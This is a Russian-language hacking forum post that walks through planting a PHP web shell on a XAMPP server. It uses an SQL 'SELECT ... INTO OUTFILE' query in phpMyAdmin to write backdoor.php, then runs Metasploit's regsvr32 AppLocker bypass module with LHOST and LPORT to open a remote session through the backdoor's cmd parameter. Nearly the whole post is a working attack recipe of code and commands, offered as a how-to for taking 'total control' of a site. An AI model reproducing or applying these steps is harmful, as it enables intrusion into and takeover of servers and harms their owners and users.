Загрузка...

Загрузка Shell-кода на наш веб-сервер.

Тема в разделе Веб уязвимости создана пользователем ТипаЕллиот 12 апр 2017. (поднята 23 фев 2017) 1045 просмотров

Загрузка...
  1. ТипаЕллиот
    ТипаЕллиот Автор темы 12 апр 2017 17 21 окт 2016
    Добрый вечер,господа.
    Сегодня мы рассмотрим с вами загрузку shell-кода на сервер(сайт).
    В качестве платформы будем рассматривать XAMPP,о котором я напишу в следующей статьи.

    Для начала работы,у нас должен будет сгенирирован запрос SQL для выполнения нашего shell-кода,а потом попотеть,что бы получить полный доступ.
    Сначала работать будем c PhpMyAdmin.

    1.Заходим в панель управления и создаём новую SQL-базу(базу данных).
    2. После того,как создали и выбрали эту базу,мы открываем поле SQL и вписываем туда представленный ниже код генерации запроса:

    Код
    > SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “C:\\xampp\\htdocs\\backdoor.php”

    3. По теории,наша уязвимость создана,но что бы проверить достаточно обратиться к серверу по адресу localhost/backdoor.php
    Если мы получаем выхлоп,в котором сказано о успешной работе(скрин приложу потом),то наш бэкдур создан.

    Используя адресную строку в браузере мы можем передовать команды из cmd на сервер.

    Далее,что бы получить полный(тотальный) контроль над сайтом,достаточно воспользоваться утиллитой - Meterpreter Console (msfconsole).
    Открываем нашу утиллиту,используем эксплоит(regsvr32)

    Код
    use exploit/windows/misc/regsvr32_applocker_bypass_server

    Далее настраиваем наш эксплоит:

    Код
    set LHOST *IP-адрес сервера*
    set LPORT 4444
    exploit

    Выделенный текст нам нужно будет использовать как команду в cmd,т.е. ***** текст вместе с ссылкой:
    []SRC] localhost/backdoor.php?cmd=*текст*[/SRC]

    Вот и всё.
     
Top